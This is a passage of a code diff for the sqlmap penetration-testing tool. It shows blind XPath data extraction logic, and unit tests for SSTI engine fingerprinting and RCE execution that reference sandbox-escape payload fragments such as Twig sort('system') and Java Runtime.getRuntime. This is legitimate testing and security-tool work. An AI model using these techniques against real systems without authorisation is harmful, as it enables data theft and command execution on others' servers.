+ conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))
+ continue
+
+ if backendHint:
+ logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))
+
+ if not slots:
+ if found:
+ logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
+ logger.info("XPath scan complete")
+ return
+ if tested:
+ warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested
+ else:
+ warnMsg = "no parameters found to test for XPath injection"
+ logger.warning(warnMsg)
+ return
+
+ # Select the first oracle-bearing slot with an extractable boundary for tree-walking
+ slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None)
+ if not slot:
+ logger.info("XPath scan complete")
+ return
+
+ original = _originalValue(slot.place, slot.parameter) or "x"
+ # OR-style boundaries always-true if the original branch matches, so use a
+ # sentinel that is guaranteed not to appear as a field value. AND-style
+ # boundaries need the original branch to match; keep the original there.
+ if " or " in slot.boundary.prefix:
+ base = SENTINEL
+ else:
+ base = original
+ builder = _XPathPayloadBuilder(base, slot.boundary)
+ oracle = slot.oracle
+
+ # Refine backend fingerprint if generic
+ if not slot.backend or slot.backend == "Generic XPath":
+ backend = _backendFromError(oracle.template)
+ if backend:
+ backend = _fingerprintByError(backend)
+ if backend:
+ logger.info("identified back-end: '%s'" % backend)
+ slot = slot._replace(backend=backend)
+
+ title = "XPath boolean-based blind"
+ conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload))
+
+ # Blind XML tree-walking (attempted document-root traversal)
+ logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
+ root = _walkTree(oracle, builder)
+
+ if root:
+ columns, rows = _treeToTable(root)
+ logger.info("extracted %d node(s) from XML tree" % (len(rows)))
+ _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)
+ else:
+ warnMsg = "XPath injection is confirmed but the XML tree could not be walked. "
+ warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
+ logger.warning(warnMsg)
+
+ logger.info("XPath scan complete")
diff --git a/tests/_testutils.py b/tests/_testutils.py
index 7ec9a4e3b4..781f54749a 100644
--- a/tests/_testutils.py
+++ b/tests/_testutils.py
@@ -73,6 +73,15 @@ def bootstrap():
import logging
logging.getLogger("sqlmapLog").setLevel(logging.CRITICAL + 1)
+ # Some console output bypasses the logger entirely and goes straight through dataToStdout():
+ # the \r-progress lines ("[INFO] retrieved: ...", "[INFO] cracked password ..."), and the echo
+ # of batch-auto-answered readInput() prompts (the fingerprint-mismatch prompt, the LIKE/exact
+ # and common-wordlist choices, ...). dataToStdout() only writes forced output or when
+ # kb.wizardMode is False, and readInput() echoes with forceOutput=not kb.wizardMode - so setting
+ # wizardMode keeps the unittest report to just dots. wizardMode is read ONLY by dataToStdout/
+ # readInput (plus the interactive wizard flow, unused here), so this has no effect on results.
+ kb.wizardMode = True
+
sys.argv = _orig_argv # restore so unittest's arg parsing works
_BOOTSTRAPPED = True
diff --git a/tests/test_checks.py b/tests/test_checks.py
index d0fe284c9d..7300c39bb7 100644
--- a/tests/test_checks.py
+++ b/tests/test_checks.py
@@ -49,7 +49,7 @@
# test never leaks state into another test or the rest of the suite.
_CONF_KEYS = (
"paramDict", "parameters", "url", "hostname", "method", "skipHeuristics",
- "prefix", "suffix", "nosql", "graphql", "ldap", "beep", "string",
+ "prefix", "suffix", "nosql", "graphql", "ldap", "xpath", "ssti", "beep", "string",
"notString", "regexp", "regex", "dummy", "offline", "skipWaf", "data",
"hashDB", "cj", "cookie", "dropSetCookie", "httpHeaders", "proxy", "tor",
"tamper", "timeout", "retries", "textOnly", "ignoreCode", "disablePrecon",
@@ -177,7 +177,7 @@ def setUp(self):
conf.parameters = {PLACE.GET: "id=1"}
conf.url = "http://test.invalid/index.php?id=1"
conf.method = None
- conf.nosql = conf.graphql = conf.ldap = False
+ conf.nosql = conf.graphql = conf.ldap = conf.xpath = conf.ssti = False
conf.beep = False
kb.heavilyDynamic = False
kb.dynamicParameter = False
diff --git a/tests/test_graphql.py b/tests/test_graphql.py
index 753c5dba3a..5be9d901b8 100644
--- a/tests/test_graphql.py
+++ b/tests/test_graphql.py
@@ -727,5 +727,67 @@ def test_cell_unicode(self):
self.assertIn("caf", gi._cell(u"caf\xe9"))
+class TestGraphqlSuggestionRecovery(unittest.TestCase):
+ """G1: schema recovery from 'Did you mean' suggestions when introspection is disabled."""
+
+ def setUp(self):
+ self._gql = gi._gqlSend
+
+ def tearDown(self):
+ gi._gqlSend = self._gql
+
+ def test_harvest_suggestions_both_quote_styles(self):
+ # graphql-js uses double quotes; some servers use single quotes + Oxford 'or'
+ self.assertEqual(
+ gi._harvestSuggestions('Cannot query field "x" on type "Query". Did you mean "user" or "search"?'),
+ ["user", "search"])
+ self.assertEqual(
+ gi._harvestSuggestions("Cannot query field 'x' on type 'Query'. Did you mean 'user', 'me', or 'node'?"),
+ ["user", "me", "node"])
+ self.assertEqual(gi._harvestSuggestions("no suggestion here"), [])
+
+ def test_suggest_fields_from_validation_errors(self):
+ # An unknown field elicits the closest real field names (graphql-js phrasing)
+ def fake(endpoint, query, variables=None):
+ if "{ user }" in query or "{user}" in query:
+ return '{"data":{"user":null}}', 200 # 'user' is a real (resolving) field
+ return ('{"errors":[{"message":"Cannot query field \\"%s\\" on type \\"Query\\". '
+ 'Did you mean \\"user\\", \\"search\\" or \\"login\\"?"}]}'
+ % "zz", 200)
+ gi._gqlSend = fake
+ fields = gi._suggestFields("http://t/graphql", "query")
+ for expected in ("user", "search", "login"):
+ self.assertIn(expected, fields)
+
+ def test_suggest_args_from_unknown_argument(self):
+ def fake(endpoint, query, variables=None):
+ return ('{"errors":[{"message":"Unknown argument \\"zz\\" on field \\"Query.user\\". '
+ 'Did you mean \\"username\\"?"}]}', 200)
+ gi._gqlSend = fake
+ self.assertIn("username", gi._suggestArgs("http://t/graphql", "query", "user"))
+
+ def test_introspect_via_suggestions_builds_slots(self):
+ def fake(endpoint, query, variables=None):
+ # introspection-style queries already filtered upstream; here every unknown field
+ # yields the same suggestion set, and 'search' resolves as a real field
+ if "{ search }" in query or "{search}" in query:
+ return '{"data":{"search":[]}}', 200
+ if "Unknown argument" in query: # never matches; args fall back to wordlist
+ return '{}', 200
+ return ('{"errors":[{"message":"Cannot query field \\"zz\\" on type \\"Query\\". '
+ 'Did you mean \\"search\\"?"}]}', 200)
+ gi._gqlSend = fake
+ slots = gi._introspectViaSuggestions("http://t/graphql")
+ self.assertIsNotNone(slots)
+ self.assertTrue(any(s.fieldName == "search" for s in slots))
+ self.assertTrue(all(s.strategy == "string" for s in slots))
+
+ def test_introspect_via_suggestions_none_without_suggestions(self):
+ def fake(endpoint, query, variables=None):
+ return '{"errors":[{"message":"Syntax Error: unexpected token"}]}', 200
+ gi._gqlSend = fake
+ self.assertIsNone(gi._introspectViaSuggestions("http://t/graphql"))
+
+
if __name__ == "__main__":
unittest.main()
diff --git a/tests/test_hash_crack.py b/tests/test_hash_crack.py
index 4e9e067ff3..3d61d00d14 100644
--- a/tests/test_hash_crack.py
+++ b/tests/test_hash_crack.py
@@ -77,7 +77,18 @@ def setUp(self):
conf.hashDB = None
kb.wordlists = [self.wordlist]
+ # cracking prints "[INFO] cracked password ..." via dataToStdout(forceOutput=True), which
+ # bypasses both the logger and kb.wizardMode suppression; redirect stdout so the unittest
+ # report stays clean (these tests assert on return values/kb, never on console output).
+ self._saved_stdout = sys.stdout
+ sys.stdout = open(os.devnull, "w")
+
def tearDown(self):
+ if getattr(self, "_saved_stdout", None) is not None:
+ try:
+ sys.stdout.close()
+ finally:
+ sys.stdout = self._saved_stdout
conf.disableMulti = self._saved["disableMulti"]
conf.hashDB = self._saved["hashDB"]
conf.hashFile = self._saved["hashFile"]
diff --git a/tests/test_ssti.py b/tests/test_ssti.py
new file mode 100644
index 0000000000..02ff44f35a
--- /dev/null
+++ b/tests/test_ssti.py
@@ -0,0 +1,611 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline tests for the SSTI detection and fingerprinting engine. Mock _send() stands
+in for the HTTP/Jinja2 layer so engine table integrity, arithmetic proof, error
+detection, boolean oracle, distinguishing probes, and fingerprinting can be
+exercised without a live target.
+"""
+
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.ssti.inject as ssti
+
+
+SENTINEL = ssti.SENTINEL
+
+
+class TestHelpers(unittest.TestCase):
+ def test_ratio(self):
+ self.assertGreater(ssti._ratio("abc", "abc"), 0.9)
+ self.assertLess(ssti._ratio("abc", "xyz"), 0.5)
+
+ def test_delim(self):
+ from lib.core.enums import PLACE
+ self.assertEqual(ssti._delim(PLACE.GET), '&')
+ self.assertEqual(ssti._delim(PLACE.COOKIE), ';')
+
+
+class TestEngineTable(unittest.TestCase):
+ def test_all_engines_have_required_fields(self):
+ for engine in ssti._ENGINE_TABLE:
+ self.assertTrue(len(engine.name) > 0)
+ self.assertTrue(len(engine.delimiter) > 0)
+
+ def test_arithmetic_engines_have_format_strings(self):
+ noArith = ("Velocity", "Handlebars")
+ for engine in ssti._ENGINE_TABLE:
+ if engine.name not in noArith:
+ self.assertIn("%d", engine.arithmeticFmt,
+ "Engine '%s' arithmeticFmt must contain %%d placeholders" % engine.name)
+
+ def test_error_probes_present(self):
+ for engine in ssti._ENGINE_TABLE:
+ if engine.errorRegex:
+ self.assertTrue(len(engine.errorProbes) > 0,
+ "Engine '%s' has errorRegex but no errorProbes" % engine.name)
+
+ def test_distinguishing_probes_for_curly_engines(self):
+ curlyEngines = [e for e in ssti._ENGINE_TABLE if e.delimiter == "{{"]
+ withProbes = [e for e in curlyEngines if e.distinguishingProbe]
+ # Jinja2 and Twig are distinguished by trueRendered/falseRendered;
+ # Twig/Handlebars have distinguishing probes. At least one curly engine
+ # must have a probe, but Jinja2 can rely on boolean rendering difference.
+ self.assertGreaterEqual(len(withProbes), 1,
+ "At least one {{}}-delimited engine needs a distinguishing probe")
+
+ def test_boolean_payloads_differ(self):
+ for engine in ssti._ENGINE_TABLE:
+ self.assertNotEqual(engine.booleanTrue, engine.booleanFalse,
+ "Engine '%s' true/false payloads must differ" % engine.name)
+ if engine.trueRendered:
+ self.assertNotEqual(engine.trueRendered, engine.falseRendered,
+ "Engine '%s' true/false rendered values must differ" % engine.name)
+
+
+class TestArithmeticDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_arithmetic_control_pair(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+
+ def mock(place, parameter, value):
+ import re
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ a, b = int(m.group(1)), int(m.group(2))
+ return "Hello %d" % (a * b)
+ return "Hello " + value
+
+ ssti._send = mock
+ self.assertTrue(ssti._probeArithmetic("GET", "q", engine))
+
+ def test_arithmetic_requires_both_results_correct(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello 42" # always returns 42 regardless of payload
+
+ ssti._send = mock
+ # Control pair check: result1 must NOT appear in page2 and vice versa
+ self.assertFalse(ssti._probeArithmetic("GET", "q", engine))
+
+ def test_handlebars_skipped(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ self.assertFalse(ssti._probeArithmetic("GET", "q", engine))
+
+
+class TestErrorDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_error_detected(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ if "{{" in value and "unknown" in value:
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected '}'"
+ return "Hello " + value
+
+ ssti._send = mock
+ page = ssti._probeError("GET", "q", engine)
+ self.assertIsNotNone(page)
+
+ def test_no_error_on_normal_response(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello " + value
+
+ ssti._send = mock
+ page = ssti._probeError("GET", "q", engine)
+ self.assertIsNone(page)
+
+ def test_backend_from_error(self):
+ page = "jinja2.exceptions.UndefinedError: 'foo' is undefined"
+ backend = ssti._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+
+class TestDistinguishingProbes(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_no_distinguishing_probe(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ self.assertFalse(engine.distinguishingProbe,
+ "Jinja2 uses trueRendered/falseRendered for disambiguation, not a separate probe")
+
+ def test_no_distinguishing_without_probe(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Pug/Jade"][0]
+ self.assertFalse(ssti._probeDistinguishing("GET", "q", engine))
+
+ def test_comment_probe_reflection_rejected(self):
+ """Comment-style probe reflected verbatim must not pass."""
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Freemarker"][0]
+
+ def mock(place, parameter, value):
+ if "<#--" in value:
+ return "Hello <#-- freemarker -->" # raw reflection
+ return "Hello " + value
+
+ ssti._send = mock
+ self.assertFalse(ssti._probeDistinguishing("GET", "q", engine))
+
+
+class TestBooleanDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_boolean(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ if "True" in value:
+ return "Hello True"
+ elif "False" in value:
+ return "Hello False"
+ return "Hello " + value
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNotNone(template)
+
+ def test_no_boolean_when_true_false_same(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "same response"
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNone(template)
+
+ def test_plain_reflection_rejected(self):
+ """Raw payload reflection must not pass boolean detection."""
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello " + value # reflects payload verbatim
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNone(template)
+
+
+class TestFingerprint(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_fingerprinted_with_arith_and_boolean(self):
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ if "True" in value:
+ return "Hello True" # Jinja2-style boolean rendering
+ if "False" in value:
+ return "Hello False"
+ if "unknown|filter" in value:
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected '}'"
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ self.assertIn("Jinja2", engine.name)
+ self.assertTrue(evidence.get("arithmetic"))
+ self.assertTrue(evidence.get("boolean"))
+
+
+class TestCrossEngineDisambiguation(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_preferred_over_twig_via_boolean_rendering(self):
+ """Jinja2 and Twig share {{ }} but differ in boolean rendering.
+ Jinja2 renders True as 'True', Twig renders true as '1'.
+ Our detection uses trueRendered for intrinsic discrimination."""
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ # Twig-style boolean rendering (true -> 1, false -> empty)
+ if "{{ true }}" in value:
+ return "Hello 1"
+ if "{{ false }}" in value:
+ return "Hello "
+ if "{{ True }}" in value:
+ return "Hello 1" # Jinja2 True payload would not match this
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ # Twig should win because its boolean payloads match the mock
+ self.assertIn("Twig", engine.name)
+
+
+class TestExpressionEvaluation(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_eval_uses_expressionFmt(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2: expressionFmt = "{{ %s }}"
+ results = []
+
+ def mock(place, parameter, value):
+ results.append(value)
+ return "Hello __marker__ 49 __marker2__"
+
+ ssti._send = mock
+ ssti._evalExpression("GET", "q", engine, "7*7")
+ # Payload must use expressionFmt, not raw delimiter concatenation
+ self.assertIn("{{ ", results[0])
+ self.assertIn(" }}", results[0])
+
+ def test_eval_falls_back_when_no_expressionFmt(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ self.assertEqual(engine.expressionFmt, "")
+
+ def mock(place, parameter, value):
+ return "irrelevant"
+
+ ssti._send = mock
+ # Should not raise; just logs error
+ ssti._evalExpression("GET", "q", engine, "7*7")
+
+
+class TestBooleanUniqueness(unittest.TestCase):
+ def test_jinja2_boolean_unique_among_curlies(self):
+ jinja2 = ssti._ENGINE_TABLE[0]
+ self.assertTrue(ssti._booleanUniquelyIdentifies(jinja2))
+
+ def test_freemarker_boolean_unique_with_computer_format(self):
+ freemarker = [e for e in ssti._ENGINE_TABLE if e.name == "Freemarker"][0]
+ # FreeMarker uses ${true?c} (computer-format), distinct from SpringEL's ${true} and
+ # Mako's ${True}, so its boolean rendering now uniquely identifies it within the ${ } family
+ self.assertTrue(ssti._booleanUniquelyIdentifies(freemarker))
+ spring = [e for e in ssti._ENGINE_TABLE if "Spring" in e.name][0]
+ self.assertTrue(ssti._booleanUniquelyIdentifies(spring))
+
+ def test_jinja2_with_arithmetic_and_boolean_is_exact(self):
+ """Arithmetic + boolean (unique) should produce exact engine name,
+ not a family/probable guess."""
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ if "True" in value:
+ return "Hello True"
+ if "False" in value:
+ return "Hello False"
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ # Boolean is unique -> should NOT be marked "(probable"
+ self.assertNotIn("(probable", engine.name)
+ self.assertIn("Jinja2", engine.name)
+
+
+class TestTakeoverGate(unittest.TestCase):
+ def test_can_takeover_exact_engine_with_proof(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ evidence = {"arithmetic": True, "boolean": True}
+ self.assertTrue(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_probable_engine(self):
+ engine = ssti._ENGINE_TABLE[0]._replace(name="Jinja2/Twig/Handlebars-like (probable Jinja2)")
+ evidence = {"arithmetic": True}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_without_proof(self):
+ engine = ssti._ENGINE_TABLE[0]
+ evidence = {}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+ def test_cannot_takeover_without_payloads(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ evidence = {"arithmetic": True}
+ self.assertFalse(ssti._canTakeover(engine, evidence))
+
+
+class TestRequestMutation(unittest.TestCase):
+ """Verify _replaceSegment() correctly mutates parameter strings."""
+
+ def setUp(self):
+ self.original_send = ssti._send
+ self._orig_params = dict(ssti.conf.parameters) if hasattr(ssti.conf, 'parameters') else {}
+ self._orig_paramDict = dict(ssti.conf.paramDict) if hasattr(ssti.conf, 'paramDict') else {}
+ self._orig_cookieDel = getattr(ssti.conf, 'cookieDel', None)
+
+ def tearDown(self):
+ ssti._send = self.original_send
+ if hasattr(ssti.conf, 'parameters'):
+ ssti.conf.parameters.clear()
+ ssti.conf.parameters.update(self._orig_params)
+ if hasattr(ssti.conf, 'paramDict'):
+ ssti.conf.paramDict.clear()
+ ssti.conf.paramDict.update(self._orig_paramDict)
+ if self._orig_cookieDel is not None:
+ ssti.conf.cookieDel = self._orig_cookieDel
+
+ def test_replace_segment_single_param(self):
+ ssti.conf.parameters = {"GET": "q=x"}
+ result = ssti._replaceSegment("GET", "q", "test")
+ self.assertEqual(result, "q=test")
+
+ def test_replace_segment_multi_param(self):
+ ssti.conf.parameters = {"GET": "q=x&a=1&b=2"}
+ result = ssti._replaceSegment("GET", "a", "99")
+ self.assertEqual(result, "q=x&a=99&b=2")
+
+ def test_replace_segment_post(self):
+ ssti.conf.parameters = {"POST": "user=admin&pass=secret"}
+ result = ssti._replaceSegment("POST", "pass", "newpass")
+ self.assertEqual(result, "user=admin&pass=newpass")
+
+ def test_replace_segment_cookie_delim(self):
+ from lib.core.enums import PLACE
+ ssti.conf.parameters = {PLACE.COOKIE: "a=1;b=2"}
+ ssti.conf.cookieDel = ";"
+ result = ssti._replaceSegment(PLACE.COOKIE, "b", "xx")
+ self.assertEqual(result, "a=1;b=xx")
+
+ def test_replace_segment_missing_param(self):
+ ssti.conf.parameters = {"GET": "a=1"}
+ ssti.conf.paramDict = {"GET": {"a": "1", "b": "2"}}
+ result = ssti._replaceSegment("GET", "b", "xx")
+ self.assertEqual(result, "a=1&b=xx")
+
+
+class TestExecuteCommand(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+ self.original_dumper = getattr(ssti.conf, 'dumper', None)
+ # Provide a mock dumper so _executeCommand doesn't crash on conf.dumper
+ from lib.core.datatype import AttribDict
+ ssti.conf.dumper = AttribDict()
+ ssti.conf.dumper.singleString = lambda msg: None
+
+ def tearDown(self):
+ ssti._send = self.original_send
+ if self.original_dumper is not None:
+ ssti.conf.dumper = self.original_dumper
+
+ def test_error_page_skipped(self):
+ """RCE payload that triggers a template error is skipped; next payload tried."""
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ calls = []
+
+ def mock(place, parameter, value):
+ calls.append(value)
+ if "cycler" in value:
+ return "jinja2.exceptions.UndefinedError: 'cycler' is undefined"
+ if "config" in value:
+ return "Hello output-from-config"
+ return "Hello " + value
+
+ ssti._send = mock
+ ssti._executeCommand("GET", "q", engine, "test")
+ # Should skip cycler (error) and use config (valid output)
+ self.assertTrue(any("config" in c for c in calls),
+ "Should have tried the second payload after error skip")
+
+ def test_all_error_pages_produce_warning(self):
+ """When all RCE payloads produce template errors, no success is reported.
+ _executeCommand sends baseline + one request per fallback payload."""
+ engine = ssti._ENGINE_TABLE[0]
+ calls = []
+
+ def mock(place, parameter, value):
+ calls.append(value)
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected token"
+
+ ssti._send = mock
+ ssti._executeCommand("GET", "q", engine, "test")
+ # 1 baseline + N payload attempts = N+1 calls
+ self.assertEqual(len(calls), len(engine.rcePayloads) + 1,
+ "Should have tried all payloads (baseline + one per fallback) before giving up")
+
+
+class TestCommandEscaping(unittest.TestCase):
+ def test_escape_single_quoted(self):
+ self.assertEqual(ssti._escapeSingleQuoted("hello"), "hello")
+ self.assertEqual(ssti._escapeSingleQuoted("it's"), "it\\'s")
+ self.assertEqual(ssti._escapeSingleQuoted("a\\b"), "a\\\\b")
+
+
+class TestEngineMatrix(unittest.TestCase):
+ """For EVERY engine in the table, stand up a faithful mock server running that
+ engine and assert _fingerprint() identifies it. This proves each engine's full
+ detection path (arithmetic/boolean/error/distinguishing) actually works end to
+ end - not just Jinja2 - and guards against regressions like the ERB '%>' format
+ bug where a delimiter containing '%' silently disabled arithmetic detection."""
+
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ # Digit-free, boolean-word-free sample errors that match each engine's errorRegex.
+ # (digit/boolean-free so a sibling engine's boolean probe falling through to the error
+ # branch on this server is still correctly rejected.)
+ _ERRORS = {
+ "Jinja2": "jinja2.exceptions.TemplateSyntaxError: unexpected end of template",
+ "Mako": "mako.exceptions.SyntaxException: unclosed control structure",
+ "Twig": "Twig_Error_Syntax: unexpected token in template",
+ "Freemarker": "freemarker.core.ParseException: encountered unexpected directive",
+ "Velocity": "org.apache.velocity.runtime.parser.ParseErrorException: encountered eof",
+ "Spring EL / Thymeleaf": "org.springframework.expression.spel.SpelParseException: bad node",
+ "ERB": "(erb): syntax error, unexpected end-of-input",
+ "Pug/Jade": "pug: unexpected token in template",
+ "Handlebars": "Handlebars: Parse error on line one",
+ }
+
+ # Real divide-by-zero error text per language family (captured from live Mako/ERB/Jinja2
+ # backends), so the S2 family probe can be exercised. JS yields Infinity (no error).
+ _DIVZERO = {
+ "python": "ZeroDivisionError: division by zero",
+ "ruby": "ZeroDivisionError: divided by 0",
+ "php": "DivisionByZeroError: Division by zero",
+ "java": "java.lang.ArithmeticException: / by zero",
+ "nodejs": "Hello Infinity",
+ }
+
+ @staticmethod
+ def _make_server(engine, errors):
+ import re
+ op = re.escape(engine.delimiter)
+ cl = re.escape(engine.delimiterClose)
+ arithRe = re.compile(op + r"\s*(\d+)\s*\*\s*(\d+)\s*" + cl) if engine.arithmeticFmt else None
+ divZero = TestEngineMatrix._DIVZERO
+ err = errors.get(engine.name)
+
+ def server(place, parameter, value):
+ # 1) engine-specific distinguishing probe
+ if engine.distinguishingProbe and engine.distinguishingProbe in value:
+ if engine.distinguishingResult:
+ return "Hello " + engine.distinguishingResult
+ return "Hello" # comment-style probe -> stays at baseline
+ # 2) this engine's own boolean rendering
+ if engine.booleanTrue and engine.booleanTrue in value:
+ return "Hello " + engine.trueRendered
+ if engine.booleanFalse and engine.booleanFalse in value:
+ return "Hello " + engine.falseRendered
+ # 3) divide-by-zero -> language-family-specific error (S2), for engines that evaluate it
+ if arithRe is not None and (engine.delimiter + "1/0" + engine.delimiterClose) in value:
+ return divZero.get(engine.family, "Hello")
+ # 4) arithmetic, but ONLY for engines that actually evaluate it
+ if arithRe is not None:
+ m = arithRe.search(value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ # 5) malformed fragment in this engine's delimiter -> engine-specific error
+ if err and any(p in value for p in engine.errorProbes):
+ return err
+ # 6) anything else (incl. other engines' payloads) renders inertly
+ return "Hello"
+
+ return server
+
+ def test_every_engine_is_fingerprinted(self):
+ for engine in ssti._ENGINE_TABLE:
+ ssti._send = self._make_server(engine, self._ERRORS)
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(result, "engine '%s' was not detected at all" % engine.name)
+ self.assertIn(engine.name, result.name,
+ "server running '%s' was identified as '%s'" % (engine.name, result.name))
+
+ def test_family_probe_confirms_language(self):
+ # S2: the divide-by-zero probe must confirm the backend family for every
+ # expression-evaluating, non-JS engine (Python/Ruby/PHP/Java).
+ for engine in ssti._ENGINE_TABLE:
+ if not (engine.arithmeticFmt and engine.delimiterClose):
+ continue
+ if engine.family not in ("python", "ruby", "php", "java"):
+ continue
+ ssti._send = self._make_server(engine, self._ERRORS)
+ _result, evidence = ssti._fingerprint("GET", "q")
+ self.assertTrue(evidence.get("family"),
+ "family probe should confirm '%s' on a %s backend" % (engine.name, engine.family))
+
+ def test_filter_evasion_rce_fallbacks_present(self):
+ # S3: each engine must retain its filter-evasion / sandbox-escape RCE fallbacks.
+ def rce(name):
+ return " ".join(p for p, _d in next(e for e in ssti._ENGINE_TABLE if e.name == name).rcePayloads)
+ jinja = rce("Jinja2")
+ self.assertIn("attr(", jinja) # dot/underscore-free attr() chain
+ self.assertIn("\\x5f", jinja) # hex-escaped dunders
+ twig = rce("Twig")
+ self.assertIn("sort('system')", twig)
+ self.assertIn("map('system')", twig)
+ spring = rce("Spring EL / Thymeleaf")
+ self.assertIn("readLine", spring) # output-capturing SpEL
+ self.assertIn("@java.lang.Runtime@getRuntime", spring) # OGNL fallback
+
+ def test_family_probe_does_not_crossmatch(self):
+ # Python 'division by zero' must NOT satisfy the (case-sensitive) PHP signature, so a
+ # Jinja2/Python server never lets Twig/PHP claim a family match.
+ jinja = next(e for e in ssti._ENGINE_TABLE if e.name == "Jinja2")
+ ssti._send = self._make_server(jinja, self._ERRORS)
+ cache = {}
+ twig = next(e for e in ssti._ENGINE_TABLE if e.name == "Twig")
+ self.assertEqual(ssti._probeFamily("GET", "q", jinja, cache), "python")
+ self.assertNotEqual(ssti._probeFamily("GET", "q", twig, cache), twig.family)
+
+ def test_erb_arithmetic_works_after_format_fix(self):
+ # Direct regression guard for the '<%= %d*%d %>' / '<%= %s %>' format bug.
+ erb = next(e for e in ssti._ENGINE_TABLE if e.name == "ERB")
+ ssti._send = self._make_server(erb, self._ERRORS)
+ self.assertTrue(ssti._probeArithmetic("GET", "q", erb),
+ "ERB arithmetic proof must succeed once %-format no longer crashes on '%>'")
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertEqual(result.name, "ERB")
+ self.assertTrue(evidence.get("arithmetic"))
+
+ def test_mako_distinguished_from_freemarker_spring(self):
+ # Mako shares '${ }' with Freemarker/Spring but renders capital True/False;
+ # it must be named exactly (via unique boolean rendering), not "probable".
+ mako = next(e for e in ssti._ENGINE_TABLE if e.name == "Mako")
+ ssti._send = self._make_server(mako, self._ERRORS)
+ result, evidence = ssti._fingerprint("GET", "q")
+ self.assertEqual(result.name, "Mako")
+ self.assertTrue(evidence.get("boolean"))
